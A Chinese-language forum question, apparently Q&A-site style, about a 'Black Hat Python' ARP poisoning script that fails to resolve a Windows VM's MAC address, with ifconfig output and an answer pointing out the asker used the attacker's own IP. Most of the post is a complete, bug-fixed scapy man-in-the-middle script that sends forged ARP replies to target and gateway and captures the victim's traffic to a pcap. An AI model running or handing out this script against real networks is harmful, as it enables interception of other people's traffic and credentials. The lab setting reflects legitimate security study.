Justin Seitz 的《Black Hat Python》第四章详细介绍了如何使用 scapy 进行 ARP 欺骗(ARP 投毒)。我在获取目标机器 IP 对应的 MAC 地址时遇到了问题。我使用 Kali 虚拟机作为攻击机,使用 Win 7 虚拟机作为目标机。
from scapy.all import *
import os
import sys
import threading
import signal
# Capture settings.
interface = "eth0"     # NIC scapy sends and sniffs on
packet_count = 1000    # sniff() stops after this many packets

# The two hosts whose ARP caches the script rewrites.
# NOTE(review): 10.0.2.15 is the address ifconfig reports for this host's own
# eth0, so the lookup for target_ip asks for our own MAC; that matches the
# "Failed to get target MAC" output. target_ip must be the other VM's address.
# NOTE(review): 10.0.2.15 / 10.0.2.2 look like the defaults of a VirtualBox NAT
# adapter, where each guest sits on its own isolated network - confirm that
# both VMs share one layer-2 segment before expecting an ARP answer.
gateway_ip = "10.0.2.2"
target_ip = "10.0.2.15"
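def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the genuine IP-to-MAC pairings, then signal the process.

    Sends five ARP replies (op=2) that pair gateway_ip with gateway_mac and
    five that pair target_ip with target_mac, each with hwdst set to the
    broadcast address, and finally raises SIGINT in this process.
    """
    print("[*] Restoring target...")
    broadcast = "ff:ff:ff:ff:ff:ff"

    # Tell the target where the gateway really is.
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst=broadcast, hwsrc=gateway_mac), count=5)
    # Tell the gateway where the target really is. The scapy class is ARP;
    # the original spelled it `Arp`, which raised NameError, so this second
    # restore packet was never sent.
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst=broadcast, hwsrc=target_mac), count=5)

    # SIGINT surfaces as KeyboardInterrupt in the main thread; the script uses
    # that to stop.
    os.kill(os.getpid(), signal.SIGINT)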
def get_mac(ip_address):
    """Return the MAC address that answers an ARP request for ip_address.

    Returns None when srp() collects no answer at all.
    """
    # Broadcast frame carrying the ARP request; timeout=2 and retry=10 bound
    # how long an unanswered lookup blocks.
    probe = Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address)
    answered, _unanswered = srp(probe, timeout=2, retry=10)

    # Only the first (sent, received) pair is consulted.
    return next((reply[Ether].src for _sent, reply in answered), None)
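def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Send forged ARP replies to target and gateway every two seconds.

    One reply claims gateway_ip towards the target, the other claims target_ip
    towards the gateway. hwsrc is never set here, so scapy fills in the
    sending interface's own MAC. The loop ends only on KeyboardInterrupt,
    after which restore_target() is called.

    Unsolicited replies that remap a gateway IP to a different MAC are the
    pattern ARP monitoring (arpwatch, switch-side Dynamic ARP Inspection)
    is built to flag.

    NOTE(review): CPython raises KeyboardInterrupt in the main thread only, so
    when this function runs in a worker thread the handler below is not
    reached and the loop keeps sending after the main thread has called
    restore_target().
    """
    # The file's import block has no `import time`; the original relied on
    # the scapy star import to provide the name.
    import time

    # Locals are named differently from the function so they no longer shadow
    # it; the original's `posion_target.hwdst` typo raised NameError.
    to_target = ARP()
    to_target.op = 2
    to_target.psrc = gateway_ip
    to_target.pdst = target_ip
    to_target.hwdst = target_mac

    to_gateway = ARP()
    to_gateway.op = 2
    to_gateway.psrc = target_ip
    to_gateway.pdst = gateway_ip
    to_gateway.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    while True:
        try:
            send(to_target)
            send(to_gateway)
            time.sleep(2)
        except KeyboardInterrupt:
            restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
            print("[*] ARP poison attack finished.")
            return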
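# Script body: resolve both MAC addresses, start the ARP loop in a thread,
# capture packet_count packets involving target_ip, then restore the caches.
conf.iface = interface  # the original assigned this twice; once is enough
conf.verb = 0           # silence scapy's per-packet output

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting.")
    sys.exit(1)  # a failed lookup is an error, so do not report status 0
print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting.")
    sys.exit(1)
print("[*] Target %s is at %s" % (target_ip, target_mac))

# The original passed `posion_target`, an undefined name, as the thread target.
# NOTE(review): the thread is non-daemon and its loop has no stop flag, so it
# keeps sending forged replies after restore_target() below has run; a shared
# stop signal checked inside the loop would make the cleanup stick.
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print("[*] Starting sniffer for %d packets" % packet_count)
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    # arper.pcap holds the target's traffic as captured; treat it as sensitive.
    wrpcap('arper.pcap', packets)
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
except KeyboardInterrupt:
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
    sys.exit(0)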
攻击机器:
root@kali:~/Documents# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.0.2.15 netmask 255.255.255.0 broadcast 10.0.2.255
inet6 fe80::a00:27ff:fe81:b1df prefixlen 64 scopeid 0x20<link>
ether 08:00:27:81:b1:df txqueuelen 1000 (Ethernet)
RX packets 101529 bytes 101906744 (97.1 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 34775 bytes 3530239 (3.3 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 218 bytes 13972 (13.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 218 bytes 13972 (13.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
输出:
root@kali:~/Documents# sudo python arper.py
[*] Setting up eth0
[*] Gateway 10.0.2.2 is at 52:54:00:12:35:02
[!!!] Failed to get target MAC. Exiting.
答案 0 :(得分:1)
您把 Kali(攻击机)自己的 IP(10.0.2.15)用作了 target_ip。Win 虽然运行在同一台计算机上,但它在虚拟机中,而虚拟机通常有自己的 IP(https://www.quora.com/Do-virtual-machines-have-their-own-IP)
我甚至不确定虚拟机里的 Win 是否会自动处于同一网络中。请在同一个 /24 网络中为该虚拟机和 Kali 分配静态 IP(即 10.0.2.x/24,把 x 替换为具体数值),请参阅 https://serverfault.com/questions/839443/giving-the-vm-an-own-ip-address
编码器是正确的:首先用 ping 检查网络连接是否已经建立。